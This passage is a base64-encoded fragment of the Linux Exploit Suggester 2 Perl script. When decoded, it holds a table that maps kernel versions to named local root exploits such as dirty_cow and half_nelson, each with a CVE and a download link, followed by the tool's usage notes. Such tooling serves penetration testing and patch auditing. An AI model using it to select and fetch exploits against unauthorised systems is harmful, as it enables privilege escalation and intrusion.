i40LjEwJywgJzIuNC4xMScsICcyLjQuMTInLCAnMi40LjEzJywgJzIuNC4xNCcsICcyLjQuMTUnLAogICAgICAgICAgICAnMi40LjE2JywgJzIuNC4xNycsICcyLjQuMTgnLCAnMi40LjE5JywgJzIuNC4yMCcsICcyLjQuMjEnLAogICAgICAgICAgICAnMi40LjIyJywgJzIuNC4yMycsICcyLjQuMjQnLCAnMi40LjI1JywgJzIuNC4yNicsICcyLjQuMjcnLAogICAgICAgICAgICAnMi40LjI4JywgJzIuNC4yOScsICcyLjQuMzAnLCAnMi40LjMxJywgJzIuNC4zMicsICcyLjQuMzMnLAogICAgICAgICAgICAnMi40LjM0JywgJzIuNC4zNScsICcyLjQuMzYnLCAnMi40LjM3JywgJzIuNi4wJywgICcyLjYuMScsCiAgICAgICAgICAgICcyLjYuMicsICAnMi42LjMnLCAgJzIuNi40JywgICcyLjYuNScsICAnMi42LjYnLCAgJzIuNi43JywKICAgICAgICAgICAgJzIuNi44JywgICcyLjYuOScsICAnMi42LjEwJywgJzIuNi4xMScsICcyLjYuMTInLCAnMi42LjEzJywKICAgICAgICAgICAgJzIuNi4xNCcsICcyLjYuMTUnLCAnMi42LjE2JywgJzIuNi4xNycsICcyLjYuMTgnLCAnMi42LjE5JywKICAgICAgICAgICAgJzIuNi4yMCcsICcyLjYuMjEnLCAnMi42LjIyJywgJzIuNi4yMycsICcyLjYuMjQnLCAnMi42LjI1JywKICAgICAgICAgICAgJzIuNi4yNicsICcyLjYuMjcnLCAnMi42LjI4JywgJzIuNi4yOScsICcyLjYuMzAnLAogICAgICAgIF0sCiAgICAgICAgYWx0ID0+ICd3dW5kZXJiYXJfZW1wb3JpdW0nLAogICAgICAgIGN2ZSA9PiAnMjAwOS0yNjkyJywKICAgICAgICBtaWwgPT4gJ2h0dHA6Ly93d3cuZXhwbG9pdC1kYi5jb20vZXhwbG9pdHMvOTQzNScsCiAgICB9LAogICAgJ3VkcF9zZW5kbXNnXzMyYml0JyA9PiB7CiAgICAgICAgdnVsbiA9PiBbCiAgICAgICAgICAgICcyLjYuMScsICAnMi42LjInLCAgJzIuNi4zJywgICcyLjYuNCcsICAnMi42LjUnLCAgJzIuNi42JywKICAgICAgICAgICAgJzIuNi43JywgICcyLjYuOCcsICAnMi42LjknLCAgJzIuNi4xMCcsICcyLjYuMTEnLCAnMi42LjEyJywKICAgICAgICAgICAgJzIuNi4xMycsICcyLjYuMTQnLCAnMi42LjE1JywgJzIuNi4xNicsICcyLjYuMTcnLCAnMi42LjE4JywKICAgICAgICAgICAgJzIuNi4xOScsCiAgICAgICAgXSwKICAgICAgICBjdmUgPT4gJzIwMDktMjY5OCcsCiAgICAgICAgbWlsID0+CiAgICAgICAgICAnaHR0cDovL2Rvd25sb2Fkcy5zZWN1cml0eWZvY3VzLmNvbS92dWxuZXJhYmlsaXRpZXMvZXhwbG9pdHMvMzYxMDguYycsCiAgICB9LAogICAgJ3BpcGUuY18zMmJpdCcgPT4gewogICAgICAgIHZ1bG4gPT4gWwogICAgICAgICAgICAnMi40LjQnLCAgJzIuNC41JywgICcyLjQuNicsICAnMi40LjcnLCAgJzIuNC44JywgICcyLjQuOScsCiAgICAgICAgICAgICcyLjQuMTAnLCAnMi40LjExJywgJzIuNC4xMicsICcyLjQuMTMnLCAnMi40LjE0JywgJzIuNC4xNScsCiAgICAgICAgICAgICcyLjQuMTYnLCAnMi40LjE3JywgJzIuNC4xOCcsICcyLjQuMTknLCAnMi40LjIwJywgJzIuNC4yMScsCiAgICAgICAgICAgICcyLjQuMjInLCAnMi40LjIzJywgJzIuNC4yNCcsICcyLjQuMjUnLCAnMi40LjI2JywgJzIuNC4yNycsCiAgICAgICAgICAgICcyLjQuMjgnLCAnMi40LjI5JywgJzIuNC4zMCcsICcyLjQuMzEnLCAnMi40LjMyJywgJzIuNC4zMycsCiAgICAgICAgICAgICcyLjQuMzQnLCAnMi40LjM1JywgJzIuNC4zNicsICcyLjQuMzcnLCAnMi42LjE1JywgJzIuNi4xNicsCiAgICAgICAgICAgICcyLjYuMTcnLCAnMi42LjE4JywgJzIuNi4xOScsICcyLjYuMjAnLCAnMi42LjIxJywgJzIuNi4yMicsCiAgICAgICAgICAgICcyLjYuMjMnLCAnMi42LjI0JywgJzIuNi4yNScsICcyLjYuMjYnLCAnMi42LjI3JywgJzIuNi4yOCcsCiAgICAgICAgICAgICcyLjYuMjknLCAnMi42LjMwJywgJzIuNi4zMScsCiAgICAgICAgXSwKICAgICAgICBjdmUgPT4gJzIwMDktMzU0NycsCiAgICAgICAgbWlsID0+CiAgICAgICAgICAnaHR0cDovL3d3dy5zZWN1cml0eWZvY3VzLmNvbS9kYXRhL3Z1bG5lcmFiaWxpdGllcy9leHBsb2l0cy8zNjkwMS0xLmMnLAogICAgfSwKICAgICdkb19wYWdlc19tb3ZlJyA9PiB7CiAgICAgICAgdnVsbiA9PiBbCiAgICAgICAgICAgICcyLjYuMTgnLCAnMi42LjE5JywgJzIuNi4yMCcsICcyLjYuMjEnLCAnMi42LjIyJywgJzIuNi4yMycsCiAgICAgICAgICAgICcyLjYuMjQnLCAnMi42LjI1JywgJzIuNi4yNicsICcyLjYuMjcnLCAnMi42LjI4JywgJzIuNi4yOScsCiAgICAgICAgICAgICcyLjYuMzAnLCAnMi42LjMxJywKICAgICAgICBdLAogICAgICAgIGFsdCA9PiAnc2lldmUnLAogICAgICAgIGN2ZSA9PiAnMjAxMC0wNDE1JywKICAgICAgICBtaWwgPT4gJ1NwZW5kZXJzIEVubGlnaHRlbm1lbnQnLAogICAgfSwKICAgICdyZWlzZXJmcycgPT4gewogICAgICAgIHZ1bG4gPT4gWwogICAgICAgICAgICAnMi42LjE4JywgJzIuNi4xOScsICcyLjYuMjAnLCAnMi42LjIxJywgJzIuNi4yMicsICcyLjYuMjMnLAogICAgICAgICAgICAnMi42LjI0JywgJzIuNi4yNScsICcyLjYuMjYnLCAnMi42LjI3JywgJzIuNi4yOCcsICcyLjYuMjknLAogICAgICAgICAgICAnMi42LjMwJywgJzIuNi4zMScsICcyLjYuMzInLCAnMi42LjMzJywgJzIuNi4zNCcsCiAgICAgICAgXSwKICAgICAgICBjdmUgPT4gJzIwMTAtMTE0NicsCiAgICAgICAgbWlsID0+ICdodHRwOi8vd3d3LmV4cGxvaXQtZGIuY29tL2V4cGxvaXRzLzEyMTMwJywKICAgIH0sCiAgICAnY2FuX2JjbScgPT4gewogICAgICAgIHZ1bG4gPT4gWwogICAgICAgICAgICAnMi42LjE4JywgJzIuNi4xOScsICcyLjYuMjAnLCAnMi42LjIxJywgJzIuNi4yMicsICcyLjYuMjMnLAogICAgICAgICAgICAnMi42LjI0JywgJzIuNi4yNScsICcyLjYuMjYnLCAnMi42LjI3JywgJzIuNi4yOCcsICcyLjYuMjknLAogICAgICAgICAgICAnMi42LjMwJywgJzIuNi4zMScsICcyLjYuMzInLCAnMi42LjMzJywgJzIuNi4zNCcsICcyLjYuMzUnLAogICAgICAgICAgICAnMi42LjM2JywKICAgICAgICBdLAogICAgICAgIGN2ZSA9PiAnMjAxMC0yOTU5JywKICAgICAgICBtaWwgPT4gJ2h0dHA6Ly93d3cuZXhwbG9pdC1kYi5jb20vZXhwbG9pdHMvMTQ4MTQnLAogICAgfSwKICAgICdyZHMnID0+IHsKICAgICAgICB2dWxuID0+IFsKICAgICAgICAgICAgJzIuNi4zMCcsICcyLjYuMzEnLCAnMi42LjMyJywgJzIuNi4zMycsCiAgICAgICAgICAgICcyLjYuMzQnLCAnMi42LjM1JywgJzIuNi4zNicsCiAgICAgICAgXSwKICAgICAgICBtaWwgPT4gJ2h0dHA6Ly93d3cuZXhwbG9pdC1kYi5jb20vZXhwbG9pdHMvMTUyODUnLAogICAgICAgIGN2ZSA9PiAnMjAxMC0zOTA0JywKICAgIH0sCiAgICAnaGFsZl9uZWxzb24xJyA9PiB7CiAgICAgICAgdnVsbiA9PiBbCiAgICAgICAgICAgICcyLjYuMCcsICAnMi42LjEnLCAgJzIuNi4yJywgICcyLjYuMycsICAnMi42LjQnLCAgJzIuNi41JywKICAgICAgICAgICAgJzIuNi42JywgICcyLjYuNycsICAnMi42LjgnLCAgJzIuNi45JywgICcyLjYuMTAnLCAnMi42LjExJywKICAgICAgICAgICAgJzIuNi4xMicsICcyLjYuMTMnLCAnMi42LjE0JywgJzIuNi4xNScsICcyLjYuMTYnLCAnMi42LjE3JywKICAgICAgICAgICAgJzIuNi4xOCcsICcyLjYuMTknLCAnMi42LjIwJywgJzIuNi4yMScsICcyLjYuMjInLCAnMi42LjIzJywKICAgICAgICAgICAgJzIuNi4yNCcsICcyLjYuMjUnLCAnMi42LjI2JywgJzIuNi4yNycsICcyLjYuMjgnLCAnMi42LjI5JywKICAgICAgICAgICAgJzIuNi4zMCcsICcyLjYuMzEnLCAnMi42LjMyJywgJzIuNi4zMycsICcyLjYuMzQnLCAnMi42LjM1JywKICAgICAgICAgICAgJzIuNi4zNicsCiAgICAgICAgXSwKICAgICAgICBhbHQgPT4gJ2Vjb25ldCcsCiAgICAgICAgY3ZlID0+ICcyMDEwLTM4NDgnLAogICAgICAgIG1pbCA9PiAnaHR0cDovL3d3dy5leHBsb2l0LWRiLmNvbS9leHBsb2l0cy8xNzc4NycsCiAgICB9LAogICAgJ2hhbGZfbmVsc29uMicgPT4gewogICAgICAgIHZ1bG4gPT4gWwogICAgICAgICAgICAnMi42LjAnLCAgJzIuNi4xJywgICcyLjYuMicsICAnMi42LjMnLCAgJzIuNi40JywgICcyLjYuNScsCiAgICAgICAgICAgICcyLjYuNicsICAnMi42LjcnLCAgJzIuNi44JywgICcyLjYuOScsICAnMi42LjEwJywgJzIuNi4xMScsCiAgICAgICAgICAgICcyLjYuMTInLCAnMi42LjEzJywgJzIuNi4xNCcsICcyLjYuMTUnLCAnMi42LjE2JywgJzIuNi4xNycsCiAgICAgICAgICAgICcyLjYuMTgnLCAnMi42LjE5JywgJzIuNi4yMCcsICcyLjYuMjEnLCAnMi42LjIyJywgJzIuNi4yMycsCiAgICAgICAgICAgICcyLjYuMjQnLCAnMi42LjI1JywgJzIuNi4yNicsICcyLjYuMjcnLCAnMi42LjI4JywgJzIuNi4yOScsCiAgICAgICAgICAgICcyLjYuMzAnLCAnMi42LjMxJywgJzIuNi4zMicsICcyLjYuMzMnLCAnMi42LjM0JywgJzIuNi4zNScsCiAgICAgICAgICAgICcyLjYuMzYnLAogICAgICAgIF0sCiAgICAgICAgYWx0ID0+ICdlY29uZXQnLAogICAgICAgIGN2ZSA9PiAnMjAxMC0zODUwJywKICAgICAgICBtaWwgPT4gJ2h0dHA6Ly93d3cuZXhwbG9pdC1kYi5jb20vZXhwbG9pdHMvMTc3ODcnLAogICAgfSwKICAgICdoYWxmX25lbHNvbjMnID0+IHsKICAgICAgICB2dWxuID0+IFsKICAgICAgICAgICAgJzIuNi4wJywgICcyLjYuMScsICAnMi42LjInLCAgJzIuNi4zJywgICcyLjYuNCcsICAnMi42LjUnLAogICAgICAgICAgICAnMi42LjYnLCAgJzIuNi43JywgICcyLjYuOCcsICAnMi42LjknLCAgJzIuNi4xMCcsICcyLjYuMTEnLAogICAgICAgICAgICAnMi42LjEyJywgJzIuNi4xMycsICcyLjYuMTQnLCAnMi42LjE1JywgJzIuNi4xNicsICcyLjYuMTcnLAogICAgICAgICAgICAnMi42LjE4JywgJzIuNi4xOScsICcyLjYuMjAnLCAnMi42LjIxJywgJzIuNi4yMicsICcyLjYuMjMnLAogICAgICAgICAgICAnMi42LjI0JywgJzIuNi4yNScsICcyLjYuMjYnLCAnMi42LjI3JywgJzIuNi4yOCcsICcyLjYuMjknLAogICAgICAgICAgICAnMi42LjMwJywgJzIuNi4zMScsICcyLjYuMzInLCAnMi42LjMzJywgJzIuNi4zNCcsICcyLjYuMzUnLAogICAgICAgICAgICAnMi42LjM2JywKICAgICAgICBdLAogICAgICAgIGFsdCA9PiAnZWNvbmV0JywKICAgICAgICBjdmUgPT4gJzIwMTAtNDA3MycsCiAgICAgICAgbWlsID0+ICdodHRwOi8vd3d3LmV4cGxvaXQtZGIuY29tL2V4cGxvaXRzLzE3Nzg3JywKICAgIH0sCiAgICAnY2Fwc190b19yb290JyA9PiB7CiAgICAgICAgdnVsbiA9PiBbICcyLjYuMzQnLCAnMi42LjM1JywgJzIuNi4zNicgXSwKICAgICAgICBjdmUgID0+ICduL2EnLAogICAgICAgIG1pbCA9PiAnaHR0cDovL3d3dy5leHBsb2l0LWRiLmNvbS9leHBsb2l0cy8xNTkxNicsCiAgICB9LAogICAgJ2FtZXJpY2FuLXNpZ24tbGFuZ3VhZ2UnID0+IHsKICAgICAgICB2dWxuID0+IFsKICAgICAgICAgICAgJzIuNi4wJywgICcyLjYuMScsICAnMi42LjInLCAgJzIuNi4zJywgICcyLjYuNCcsICAnMi42LjUnLAogICAgICAgICAgICAnMi42LjYnLCAgJzIuNi43JywgICcyLjYuOCcsICAnMi42LjknLCAgJzIuNi4xMCcsICcyLjYuMTEnLAogICAgICAgICAgICAnMi42LjEyJywgJzIuNi4xMycsICcyLjYuMTQnLCAnMi42LjE1JywgJzIuNi4xNicsICcyLjYuMTcnLAogICAgICAgICAgICAnMi42LjE4JywgJzIuNi4xOScsICcyLjYuMjAnLCAnMi42LjIxJywgJzIuNi4yMicsICcyLjYuMjMnLAogICAgICAgICAgICAnMi42LjI0JywgJzIuNi4yNScsICcyLjYuMjYnLCAnMi42LjI3JywgJzIuNi4yOCcsICcyLjYuMjknLAogICAgICAgICAgICAnMi42LjMwJywgJzIuNi4zMScsICcyLjYuMzInLCAnMi42LjMzJywgJzIuNi4zNCcsICcyLjYuMzUnLAogICAgICAgICAgICAnMi42LjM2JywKICAgICAgICBdLAogICAgICAgIGN2ZSA9PiAnMjAxMC00MzQ3JywKICAgICAgICBtaWwgPT4gJ2h0dHA6Ly93d3cuc2VjdXJpdHlmb2N1cy5jb20vYmlkLzQ1NDA4JywKICAgIH0sCiAgICAncGt0Y2R2ZCcgPT4gewogICAgICAgIHZ1bG4gPT4gWwogICAgICAgICAgICAnMi42LjAnLCAgJzIuNi4xJywgICcyLjYuMicsICAnMi42LjMnLCAgJzIuNi40JywgICcyLjYuNScsCiAgICAgICAgICAgICcyLjYuNicsICAnMi42LjcnLCAgJzIuNi44JywgICcyLjYuOScsICAnMi42LjEwJywgJzIuNi4xMScsCiAgICAgICAgICAgICcyLjYuMTInLCAnMi42LjEzJywgJzIuNi4xNCcsICcyLjYuMTUnLCAnMi42LjE2JywgJzIuNi4xNycsCiAgICAgICAgICAgICcyLjYuMTgnLCAnMi42LjE5JywgJzIuNi4yMCcsICcyLjYuMjEnLCAnMi42LjIyJywgJzIuNi4yMycsCiAgICAgICAgICAgICcyLjYuMjQnLCAnMi42LjI1JywgJzIuNi4yNicsICcyLjYuMjcnLCAnMi42LjI4JywgJzIuNi4yOScsCiAgICAgICAgICAgICcyLjYuMzAnLCAnMi42LjMxJywgJzIuNi4zMicsICcyLjYuMzMnLCAnMi42LjM0JywgJzIuNi4zNScsCiAgICAgICAgICAgICcyLjYuMzYnLAogICAgICAgIF0sCiAgICAgICAgY3ZlID0+ICcyMDEwLTM0MzcnLAogICAgICAgIG1pbCA9PiAnaHR0cDovL3d3dy5leHBsb2l0LWRiLmNvbS9leHBsb2l0cy8xNTE1MCcsCiAgICB9LAogICAgJ3ZpZGVvNGxpbnV4JyA9PiB7CiAgICAgICAgdnVsbiA9PiBbCiAgICAgICAgICAgICcyLjYuMCcsICAnMi42LjEnLCAgJzIuNi4yJywgICcyLjYuMycsICAnMi42LjQnLCAgJzIuNi41JywKICAgICAgICAgICAgJzIuNi42JywgICcyLjYuNycsICAnMi42LjgnLCAgJzIuNi45JywgICcyLjYuMTAnLCAnMi42LjExJywKICAgICAgICAgICAgJzIuNi4xMicsICcyLjYuMTMnLCAnMi42LjE0JywgJzIuNi4xNScsICcyLjYuMTYnLCAnMi42LjE3JywKICAgICAgICAgICAgJzIuNi4xOCcsICcyLjYuMTknLCAnMi42LjIwJywgJzIuNi4yMScsICcyLjYuMjInLCAnMi42LjIzJywKICAgICAgICAgICAgJzIuNi4yNCcsICcyLjYuMjUnLCAnMi42LjI2JywgJzIuNi4yNycsICcyLjYuMjgnLCAnMi42LjI5JywKICAgICAgICAgICAgJzIuNi4zMCcsICcyLjYuMzEnLCAnMi42LjMyJywgJzIuNi4zMycsCiAgICAgICAgXSwKICAgICAgICBjdmUgPT4gJzIwMTAtMzA4MScsCiAgICAgICAgbWlsID0+ICdodHRwOi8vd3d3LmV4cGxvaXQtZGIuY29tL2V4cGxvaXRzLzE1MDI0JywKICAgIH0sCiAgICAnbWVtb2RpcHBlcicgPT4gewogICAgICAgIHZ1bG4gPT4gWwogICAgICAgICAgICAnMi42LjM5JywgJzMuMC4wJywgJzMuMC4xJywgJzMuMC4yJywgJzMuMC4zJywgJzMuMC40JywKICAgICAgICAgICAgJzMuMC41JywgICczLjAuNicsICczLjEuMCcsCiAgICAgICAgXSwKICAgICAgICBjdmUgPT4gJzIwMTItMDA1NicsCiAgICAgICAgbWlsID0+ICdodHRwOi8vd3d3LmV4cGxvaXQtZGIuY29tL2V4cGxvaXRzLzE4NDExJywKICAgIH0sCiAgICAnc2VtdGV4JyA9PiB7CiAgICAgICAgdnVsbiA9PiBbCiAgICAgICAgICAgICcyLjYuMzcnLCAnMi42LjM4JywgJzIuNi4zOScsICczLjAuMCcsICczLjAuMScsICczLjAuMicsCiAgICAgICAgICAgICczLjAuMycsICAnMy4wLjQnLCAgJzMuMC41JywgICczLjAuNicsICczLjEuMCcsCiAgICAgICAgXSwKICAgICAgICBjdmUgPT4gJzIwMTMtMjA5NCcsCiAgICAgICAgbWlsID0+ICdodHRwOi8vd3d3LmV4cGxvaXQtZGIuY29tL2V4cGxvaXRzLzI1NDQ0JywKICAgIH0sCiAgICAncGVyZl9zd2V2ZW50JyA9PiB7CiAgICAgICAgdnVsbiA9PiBbCiAgICAgICAgICAgICczLjAuMCcsICczLjAuMScsICczLjAuMicsICczLjAuMycsICczLjAuNCcsICczLjAuNScsCiAgICAgICAgICAgICczLjAuNicsICczLjEuMCcsICczLjIuMCcsICczLjMuMCcsICczLjQuMCcsICczLjQuMScsCiAgICAgICAgICAgICczLjQuMicsICczLjQuMycsICczLjQuNCcsICczLjQuNScsICczLjQuNicsICczLjQuOCcsCiAgICAgICAgICAgICczLjQuOScsICczLjUuMCcsICczLjYuMCcsICczLjcuMCcsICczLjguMCcsICczLjguMScsCiAgICAgICAgICAgICczLjguMicsICczLjguMycsICczLjguNCcsICczLjguNScsICczLjguNicsICczLjguNycsCiAgICAgICAgICAgICczLjguOCcsICczLjguOScsCiAgICAgICAgXSwKICAgICAgICBjdmUgPT4gJzIwMTMtMjA5NCcsCiAgICAgICAgbWlsID0+ICdodHRwOi8vd3d3LmV4cGxvaXQtZGIuY29tL2V4cGxvaXRzLzI2MTMxJywKICAgIH0sCiAgICAnbXNyJyA9PiB7CiAgICAgICAgdnVsbiA9PiBbCiAgICAgICAgICAgICcyLjYuMTgnLCAnMi42LjE5JywgJzIuNi4yMCcsICcyLjYuMjEnLCAnMi42LjIyJywgJzIuNi4yMycsCiAgICAgICAgICAgICcyLjYuMjQnLCAnMi42LjI1JywgJzIuNi4yNicsICcyLjYuMjcnLCAnMi42LjI3JywgJzIuNi4yOCcsCiAgICAgICAgICAgICcyLjYuMjknLCAnMi42LjMwJywgJzIuNi4zMScsICcyLjYuMzInLCAnMi42LjMzJywgJzIuNi4zNCcsCiAgICAgICAgICAgICcyLjYuMzUnLCAnMi42LjM2JywgJzIuNi4zNycsICcyLjYuMzgnLCAnMi42LjM5JywgJzMuMC4wJywKICAgICAgICAgICAgJzMuMC4xJywgICczLjAuMicsICAnMy4wLjMnLCAgJzMuMC40JywgICczLjAuNScsICAnMy4wLjYnLAogICAgICAgICAgICAnMy4xLjAnLCAgJzMuMi4wJywgICczLjMuMCcsICAnMy40LjAnLCAgJzMuNS4wJywgICczLjYuMCcsCiAgICAgICAgICAgICczLjcuMCcsICAnMy43LjYnLAogICAgICAgIF0sCiAgICAgICAgY3ZlID0+ICcyMDEzLTAyNjgnLAogICAgICAgIG1pbCA9PiAnaHR0cDovL3d3dy5leHBsb2l0LWRiLmNvbS9leHBsb2l0cy8yNzI5NycsCiAgICB9LAogICAgJ3RpbWVvdXRwd24nID0+IHsKICAgICAgICB2dWxuID0+IFsKICAgICAgICAgICAgJzMuNC4wJywgICczLjUuMCcsICAnMy42LjAnLCAgJzMuNy4wJywgICczLjguMCcsICAnMy44LjknLCAKICAgICAgICAgICAgJzMuOS4wJywgICczLjEwLjAnLCAnMy4xMS4wJywgJzMuMTIuMCcsICczLjEzLjAnLCAnMy40LjAnLAogICAgICAgICAgICAnMy41LjAnLCAgJzMuNi4wJywgICczLjcuMCcsICAnMy44LjAnLCAgJzMuOC41JywgICczLjguNicsICAKICAgICAgICAgICAgJzMuOC45JywgICczLjkuMCcsICAnMy45LjYnLCAgJzMuMTAuMCcsICczLjEwLjYnLCAnMy4xMS4wJywKICAgICAgICAgICAgJzMuMTIuMCcsICczLjEzLjAnLCAnMy4xMy4xJwogICAgICAgIF0sCiAgICAgICAgY3ZlID0+ICcyMDE0LTAwMzgnLAogICAgICAgIG1pbCA9PiAnaHR0cDovL3d3dy5leHBsb2l0LWRiLmNvbS9leHBsb2l0cy8zMTM0NicsCiAgICB9LAogICAgJ3Jhd21vZGVQVFknID0+IHsKICAgICAgICB2dWxuID0+IFsKICAgICAgICAgICAgJzIuNi4zMScsICcyLjYuMzInLCAnMi42LjMzJywgJzIuNi4zNCcsICcyLjYuMzUnLCAnMi42LjM2JywKICAgICAgICAgICAgJzIuNi4zNycsICcyLjYuMzgnLCAnMi42LjM5JywgJzMuMTQuMCcsICczLjE1LjAnCiAgICAgICAgXSwKICAgICAgICBjdmUgPT4gJzIwMTQtMDE5NicsCiAgICAgICAgbWlsID0+ICdodHRwOi8vcGFja2V0c3Rvcm1zZWN1cml0eS5jb20vZmlsZXMvZG93bmxvYWQvMTI2NjAzL2N2ZS0yMDE0LTAxOTYtbWQuYycsCiAgICB9LAogICAgJ292ZXJsYXlmcycgPT4gewogICAgICAgIHZ1bG4gPT4gWwogICAgICAgICAgICAnMy4xMy4wJywgJzMuMTYuMCcsICczLjE5LjAnCiAgICAgICAgXSwKICAgICAgICBjdmUgPT4gJzIwMTUtODY2MCcsCiAgICAgICAgbWlsID0+ICdodHRwOi8vd3d3LmV4cGxvaXQtZGIuY29tL2V4cGxvaXRzLzM5MjMwJywKICAgIH0sCiAgICAncHBfa2V5JyA9PiB7CiAgICAgICAgdnVsbiA9PiBbCgkJCSczLjQuMCcsICAnMy41LjAnLCAgJzMuNi4wJywgICczLjcuMCcsICAnMy44LjAnLCAgJzMuOC4xJywgIAogICAgICAgICAgICAnMy44LjInLCAgJzMuOC4zJywgICczLjguNCcsICAnMy44LjUnLCAgJzMuOC42JywgICczLjguNycsICAKICAgICAgICAgICAgJzMuOC44JywgICczLjguOScsICAnMy45LjAnLCAgJzMuOS42JywgICczLjEwLjAnLCAnMy4xMC42JywgCiAgICAgICAgICAgICczLjExLjAnLCAnMy4xMi4wJywgJzMuMTMuMCcsICczLjEzLjEnCiAgICAgICAgXSwKICAgICAgICBjdmUgPT4gJzIwMTYtMDcyOCcsCiAgICAgICAgbWlsID0+ICdodHRwOi8vd3d3LmV4cGxvaXQtZGIuY29tL2V4cGxvaXRzLzM5Mjc3JywKICAgIH0sCiAgICAnZGlydHlfY293JyA9PiB7CiAgICAgICAgdnVsbiA9PiBbCiAgICAgICAgICAgICcyLjYuMjInLCAnMi42LjIzJywgJzIuNi4yNCcsICcyLjYuMjUnLCAnMi42LjI2JywgJzIuNi4yNycsIAoJCQknMi42LjI3JywgJzIuNi4yOCcsICcyLjYuMjknLCAnMi42LjMwJywgJzIuNi4zMScsICcyLjYuMzInLCAKICAgICAgICAgICAgJzIuNi4zMycsICcyLjYuMzQnLCAnMi42LjM1JywgJzIuNi4zNicsICcyLjYuMzcnLCAnMi42LjM4JywgCiAgICAgICAgICAgICcyLjYuMzknLCAnMy4wLjAnLCAgJzMuMC4xJywgICczLjAuMicsICAnMy4wLjMnLCAgJzMuMC40JywgIAogICAgICAgICAgICAnMy4wLjUnLCAgJzMuMC42JywgICczLjEuMCcsICAnMy4yLjAnLCAgJzMuMy4wJywgICczLjQuMCcsICAKICAgICAgICAgICAgJzMuNS4wJywgICczLjYuMCcsICAnMy43LjAnLCAgJzMuNy42JywgICczLjguMCcsICAnMy45LjAnCiAgICAgICAgXSwKICAgICAgICBjdmUgPT4gJzIwMTYtNTE5NScsCiAgICAgICAgbWlsID0+ICdodHRwOi8vd3d3LmV4cGxvaXQtZGIuY29tL2V4cGxvaXRzLzQwNjE2JywKICAgIH0sCiAgICAnYWZfcGFja2V0JyA9PiB7CiAgICAgICAgdnVsbiA9PiBbJzQuNC4wJyBdLAogICAgICAgIGN2ZSA9PiAnMjAxNi04NjU1JywKICAgICAgICBtaWwgPT4gJ2h0dHA6Ly93d3cuZXhwbG9pdC1kYi5jb20vZXhwbG9pdHMvNDA4NzEnLAogICAgfSwKICAgICdwYWNrZXRfc2V0X3JpbmcnID0+IHsKICAgICAgICB2dWxuID0+IFsnNC44LjAnIF0sCiAgICAgICAgY3ZlID0+ICcyMDE3LTczMDgnLAogICAgICAgIG1pbCA9PiAnaHR0cDovL3d3dy5leHBsb2l0LWRiLmNvbS9leHBsb2l0cy80MTk5NCcsCiAgICB9LAogICAgJ2Nsb25lX25ld3VzZXInID0+IHsKICAgICAgICB2dWxuID0+IFsKICAgICAgICAgICAgJzMuMy41JywgJzMuMy40JywgJzMuMy4yJywgJzMuMi4xMycsICczLjIuOScsICczLjIuMScsIAogICAgICAgICAgICAnMy4xLjgnLCAnMy4wLjUnLCAnMy4wLjQnLCAnMy4wLjInLCAnMy4wLjEnLCAnMy4yJywgJzMuMC4xJywgJzMuMCcKICAgICAgICBdLAogICAgICAgIGN2ZSA9PiAnTlxBJywKICAgICAgICBtaWwgPT4gJ2h0dHA6Ly93d3cuZXhwbG9pdC1kYi5jb20vZXhwbG9pdHMvMzgzOTAnLAogICAgfSwKICAgICdnZXRfcmVrdCcgPT4gewogICAgICAgIHZ1bG4gPT4gWwogICAgICAgICAgICAnNC40LjAnLCAnNC44LjAnLCAnNC4xMC4wJywgJzQuMTMuMCcKICAgICAgICBdLAogICAgICAgIGN2ZSA9PiAnMjAxNy0xNjY5NScsCiAgICAgICAgbWlsID0+ICdodHRwOi8vd3d3LmV4cGxvaXQtZGIuY29tL2V4cGxvaXRzLzQ1MDEwJywKICAgIH0sCiAgICAnZXhwbG9pdF94JyA9PiB7CiAgICAgICAgdnVsbiA9PiBbCiAgICAgICAgICAgICcyLjYuMjInLCAnMi42LjIzJywgJzIuNi4yNCcsICcyLjYuMjUnLCAnMi42LjI2JywgJzIuNi4yNycsCiAgICAgICAgICAgICcyLjYuMjcnLCAnMi42LjI4JywgJzIuNi4yOScsICcyLjYuMzAnLCAnMi42LjMxJywgJzIuNi4zMicsCiAgICAgICAgICAgICcyLjYuMzMnLCAnMi42LjM0JywgJzIuNi4zNScsICcyLjYuMzYnLCAnMi42LjM3JywgJzIuNi4zOCcsCiAgICAgICAgICAgICcyLjYuMzknLCAnMy4wLjAnLCAgJzMuMC4xJywgICczLjAuMicsICAnMy4wLjMnLCAgJzMuMC40JywKICAgICAgICAgICAgJzMuMC41JywgICczLjAuNicsICAnMy4xLjAnLCAgJzMuMi4wJywgICczLjMuMCcsICAnMy40LjAnLAogICAgICAgICAgICAnMy41LjAnLCAgJzMuNi4wJywgICczLjcuMCcsICAnMy43LjYnLCAgJzMuOC4wJywgICczLjkuMCcsCiAgICAgICAgICAgICczLjEwLjAnLCAnMy4xMS4wJywgJzMuMTIuMCcsICczLjEzLjAnLCAnMy4xNC4wJywgJzMuMTUuMCcsCiAgICAgICAgICAgICczLjE2LjAnLCAnMy4xNy4wJywgJzMuMTguMCcsICczLjE5LjAnLCAnNC4wLjAnLCAgJzQuMS4wJywKICAgICAgICAgICAgJzQuMi4wJywgICc0LjMuMCcsICAnNC40LjAnLCAgJzQuNS4wJywgICc0LjYuMCcsICAnNC43LjAnCiAgICAgICAgXSwKICAgICAgICBjdmUgPT4gJzIwMTgtMTQ2NjUnLAogICAgICAgIG1pbCA9PiAnaHR0cDovL3d3dy5leHBsb2l0LWRiLmNvbS9leHBsb2l0cy80NTY5NycsCiAgICB9LAogICk7Cn0KCl9fRU5EX18KPWhlYWQxIE5BTUUKCmxpbnV4X2V4cGxvaXRfc3VnZ2VzdGVyLTIucGwgLSBBIGxvY2FsIGV4cGxvaXQgc3VnZ2VzdGVyIGZvciBsaW51eAoKPWhlYWQxIERFU0NSSVBUSU9OCgpUaGlzIHBlcmwgc2NyaXB0IHdpbGwgZW51bWVyYXRlIHRoZSBwb3NzaWJsZSBleHBsb2l0cyBhdmFpbGFibGUgZm9yIGEgZ2l2ZW4ga2VybmVsIHZlcnNpb24KCj1oZWFkMSBVU0FHRQoKWy1oXSBIZWxwICh0aGlzIG1lc3NhZ2UpClsta10gS2VybmVsIG51bWJlciAoZWcuIDIuNi4yOCkKWy1kXSBPcGVuIGV4cGxvaXQgZG93bmxvYWQgbWVudQoKWW91IGNhbiBhbHNvIHByb3ZpZGUgYSBwYXJ0aWFsIGtlcm5lbCB2ZXJzaW9uIChlZy4gMi40KQp0byBzZWUgYWxsIGV4cGxvaXRzIGF2YWlsYWJsZS4KCj1oZWFkMSBBVVRIT1IKCkpvbmF0aGFuIERvbmFzIChjKSAyMDE5Cgo9Y3V0Cgo9aGVhZDEgTElDRU5TRQoKIExpbnV